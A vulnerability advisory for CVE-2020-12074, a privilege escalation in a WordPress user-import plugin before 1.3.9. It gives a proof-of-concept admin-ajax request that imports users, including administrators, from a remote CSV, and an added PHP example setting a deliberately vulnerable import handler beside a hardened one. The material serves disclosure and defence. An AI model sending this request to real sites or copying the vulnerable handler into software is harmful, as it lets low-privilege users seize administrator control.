Import Export WordPress Users < 1.3.9 - Authenticated Arbitrary User Creation
Description
"The flaw allowed anybody with subscriber-level access or above to import new users via a CSV file, including administrative-level users", which gives subscriber-level users and above a route to escalate their privileges.
Proof of Concept
POST /wp-admin/admin-ajax.php?import_page=wordpress_hf_user_csv&step=3 HTTP/1.1
Host: EXAMPLE.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Origin: http://EXAMPLE.com
Referer: http://EXAMPLE.com/wp-admin/admin.php?import=wordpress_hf_user_csv&step=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: {SUB+ COOKIES}
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

action=user_csv_import_request&file=http://REMOTESITE.com/USERS.csv&start_pos=0&end_pos=

PoC video: https://www.youtube.com/watch?v=0ejJwbFJpcU
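The flaw described above is a missing authorization check on an admin-ajax handler. As an added illustration (not the plugin's own code; the AJAX action name, function names and the CSV column order login,email,password,role are hypothetical), the following shows such a WordPress CSV import handler in its vulnerable form and a hardened form:

```php
<?php
// Added illustration, not the plugin's own code: a WordPress admin-ajax CSV user
// import in vulnerable and hardened form. The action name, function names and the
// CSV column order (login,email,password,role) are hypothetical; the WordPress
// API calls are real.

// VULNERABLE PATTERN (CWE-269). wp_ajax_* hooks fire for every logged-in user,
// subscribers included, so without an explicit capability check any account can
// drive the import, and the 'role' column lets it create administrators.
function example_csv_user_import_vulnerable() {
    $rows = array_map( 'str_getcsv', file( $_POST['file'] ) ); // remote URL accepted as-is
    foreach ( $rows as $row ) {
        wp_insert_user( array(
            'user_login' => $row[0], 'user_email' => $row[1],
            'user_pass'  => $row[2], 'role'       => $row[3],
        ) );
    }
    wp_die();
}

// HARDENED PATTERN: nonce check, capability check for the privileges the action
// really needs, local-upload-only file path, and a whitelist of assignable roles.
function example_csv_user_import_hardened() {
    check_ajax_referer( 'example_csv_user_import', 'nonce' ); // dies on failure
    if ( ! current_user_can( 'create_users' ) || ! current_user_can( 'promote_users' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 ); // sends JSON and exits
    }
    // Only a file already uploaded to this site's uploads directory, never a URL.
    $base = realpath( wp_upload_dir()['basedir'] );
    $path = realpath( $base . '/' . basename( sanitize_file_name( (string) $_POST['file'] ) ) );
    if ( false === $path || 0 !== strpos( $path, $base . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'invalid file', 400 );
    }
    $assignable = array( 'subscriber', 'customer' ); // never 'administrator' from CSV data
    $created    = 0;
    foreach ( array_map( 'str_getcsv', file( $path ) ) as $row ) {
        if ( count( $row ) < 4 || ! in_array( $row[3], $assignable, true ) ) {
            continue; // skip rows that request a role outside the whitelist
        }
        $id = wp_insert_user( array(
            'user_login' => sanitize_user( $row[0], true ), 'user_email' => sanitize_email( $row[1] ),
            'user_pass'  => $row[2],                        'role'       => $row[3],
        ) );
        if ( ! is_wp_error( $id ) ) {
            $created++;
        }
    }
    wp_send_json_success( array( 'created' => $created ) );
}
// Register only the hardened handler for the 'example_csv_user_import' AJAX action.
add_action( 'wp_ajax_example_csv_user_import', 'example_csv_user_import_hardened' );
```

The capability check is the part that closes this advisory's issue; the nonce, local-file and role-whitelist checks address the remote `file=` parameter and the administrator role that the PoC request relies on.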

Affects Plugin

Fixed in version 1.3.9

References

CVE 2020-12074
URL https://www.wordfence.com/blog/2020/03/vulnerability-patched-in-import-export-wordpress-users/
URL https://plugins.trac.wordpress.org/changeset/2252948/users-customers-import-export-for-wp-woocommerce

Classification

Type PRIVESC
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-269

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infosecchloe
Verified No
WPVDB ID 10125

Timeline

Publicly Published 2020-03-11
Added 2020-03-11
Last Updated 2020-04-24